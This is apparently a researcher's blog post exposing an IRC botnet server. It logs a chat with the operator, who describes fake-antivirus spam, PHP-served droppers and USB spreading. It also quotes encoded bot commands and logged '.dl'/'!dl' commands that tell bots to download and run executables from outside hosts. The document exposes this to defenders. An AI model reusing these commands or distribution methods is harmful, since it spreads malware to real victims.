Resolved w4hw5wg3488h.net to 213.165.89.117
Server: w4hw5wg3488h.net
Port: 5050
Channel: #oh
Topic for #oh is: .d /100/97/111/124/120/46/47/39/99/103/96/69/126/115/101/62/113/111/115/62/100/124/57/61/39/57/60/23/40/61/47/33/12/63/52/35/42/41/17/103/8/85/63/104/127/118/39/98/107/73/77/
Topic for #oh set by s at Sat Dec 01 18:36:05 2012
Oper: s!x@x
Talking with snk
<Userbased> hey
<s> sup
<Userbased> cool ircd mod
<s> yea
<Userbased> I like the link encryption as well
<Userbased> is this an asper mod?
<s> yea
<Userbased> is the spam built into the bot?
<Userbased> .s.on /100/97/111/124/49/59/47/127/124/127/58/64/127/122/102/114/119/114/112/112/114/116/101/34/124/103/104/10/115/103/52/117/91/109/ /100/97/111/124/49/59/47/127/124/127/58/64/127/122/102/114/119/114/112/112/114/116/101/34/124/103/104/10/ 204 f9555c
<Userbased> like that?
<s> no
<Userbased> oh
<Userbased> that would have been cool
<s> how u found that ip
<Userbased> how does being a zero access affilate work? I've never seen it check into a stats url
<Userbased> threatexpert
<s> its good with US installs
<s> how u know it was spam
<s> have u checked it out?
<Userbased> That was an old one. I found the exe for that
<Userbased> ran it and saw it look up MX records
<s> :)
<Userbased> is it your mail or sending for others?
<s> mine
<Userbased> I hear email still gives a good spread
<s> im not using it for spread
<s> i spam fakeav
<Userbased> Why not spam the bot then load the fakeav?
<Userbased> You could load other crap as well
<s> on US ; GB etc av loaded, on EU ppc
<s> and other ppi
<s> php script
<Userbased> ah, so it's a link, not a zip
<Userbased> makes sense
<s> its zip
<Userbased> but the link gives the zip right, it's not attached
<s> with downloader
<s> it goes to php script
<s> and php script gives the right exe
<Userbased> yes
<Userbased> same as with skype
<s> on skype not need to spread zip
<s> are u the guy from trojanforge?
<Userbased> you on there?
<Userbased> lol
<s> yes
<Userbased> why ngr with skype but this for here?
<s> i never used ngrbot
<Userbased> hmm
<s> i dont have anything todo with their ngrbot and skypespread
<s> im working alone
<Userbased> ok
<Userbased> you are snk right?
<Userbased> or do I have you mixed up?
<s> yes im snk
<Userbased> I see a snk on that server. They just stealing your name?
<s> yes
<Userbased> lame
<Userbased> so how do you spread? just spam?
<s> usb
<s> whats their server with snk inside?
<Userbased> http://www.exposedbotnets.com/2012/10/venustimeinfopl-ngrbot-irc-botnet.html
<Userbased> get.my.front sets mode +q #load snk
<Userbased> Oct 28 14:53:28 <snk> !dl hxxp://hotfile.com/dl/177749006/d16b55a/23y9bf927gfh.html
<s> hehehe funny guys :)
<Userbased> yes
<Userbased> Oct 28 15:03:24 * Received a CTCP TIME from snk (to #load)
<Userbased> Oct 28 15:03:28 * Received a CTCP VERSION from snk (to #load)
<Userbased> Oct 28 15:15:57 * Disconnected (Remote host closed socket).
<s> u have bots too?
<Userbased> too lazy to keep up with crypts and servers
<s> ok
<s> i lost whole net some days ago cos of spamhaus
<s> need to start again
<Userbased> java!java@team PRIVMSG n[USA|XP]2144220 :.dl hxxp://031919c.netsolhost.com/4531545.exe Nov 05 21:12:02 * test (java@team) has left #load
<Userbased> no backup dns?
<s> no
<s> do u know fubar?
<Userbased> ngrbot coder?
<s> yes
<s> its aspermod too
<Userbased> So I hear
<Userbased> Lots of stuff seems to use the asper base
<Userbased> how did you choose the domain, just pound on the keyboard>
<Userbased> ?
<s> yes
<Userbased> why do you always host with 1&1? are they cheap and slow to takedown or something?
<s> idk
<s> i just bought them
Hosting info: http://whois.domaintools.com/213.165.89.117
EDIT:
Now he’s spamming again:
Topic for #lol is: .s.on /100/97/111/124/49/59/47/127/124/127/58/64/127/122/102/114/119/114/112/112/114/116/101/34/124/103/104/10/115/103/52/117/91/109/ /100/97/111/124/49/59/47/127/124/127/58/64/127/122/102/114/119/114/112/112/114/116/101/34/124/103/104/10/ 327 y7f6x
Topic for #lol set by postman at Sat Dec 01 23:53:40 2012
His email lists are at http://www.chefbernards.com/ as 1 to 327.txt